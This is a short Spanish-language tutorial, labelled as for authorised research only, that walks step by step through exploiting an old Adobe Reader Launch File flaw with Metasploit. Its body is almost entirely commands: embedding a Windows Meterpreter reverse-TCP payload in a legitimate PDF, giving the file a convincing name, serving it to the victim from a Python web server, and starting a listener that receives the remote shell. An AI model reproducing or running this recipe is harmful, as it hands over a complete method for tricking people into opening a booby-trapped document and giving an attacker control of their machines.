
⚠️ Solo con fines educativos y de investigación de seguridad autorizada
Adobe Reader y Acrobat 9.x anteriores a 9.3.3, y 8.x anteriores a 8.2.3 en Windows y Mac OS X, no restringen el contenido de un campo de texto en el diálogo de advertencia Launch File, lo que facilita que atacantes remotos engañen a los usuarios para que ejecuten un programa local arbitrario especificado en un documento PDF, como lo demuestra un campo de texto que afirma que el botón Abrir permitirá al usuario leer un mensaje cifrado.

Primero, ejecuta msfconsole
msfconsole
Luego, configura el payload para incrustar el pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Establece la opción INFILENAME y proporciona la ruta directa al archivo pdf original
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
Establece el nombre del nuevo archivo PDF malicioso a algo más convincente configurando la opción FILENAME
set FILENAME laporan.pdf
Busca e incrusta el payload en el archivo PDF
set payload windows/meterpreter/reverse_tcp
Establece la opción LHOST a la IP de un atacante
set LHOST 172.16.10.10
Abre una nueva terminal y navega hasta la ubicación del archivo PDF malicioso
cd .msf4/local/
Crea un servidor temporal en python
python -m http.server
Descarga el archivo PDF malicioso en la máquina de la víctima
http://172.16.10.10:8000/certificate.pdf
Antes de ejecutar el archivo PDF malicioso en la máquina de la víctima, inicia el listener en la terminal anterior
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
Una vez que el archivo PDF malicioso se ejecuta en la máquina de la víctima, te dará una conexión con la máquina de la víctima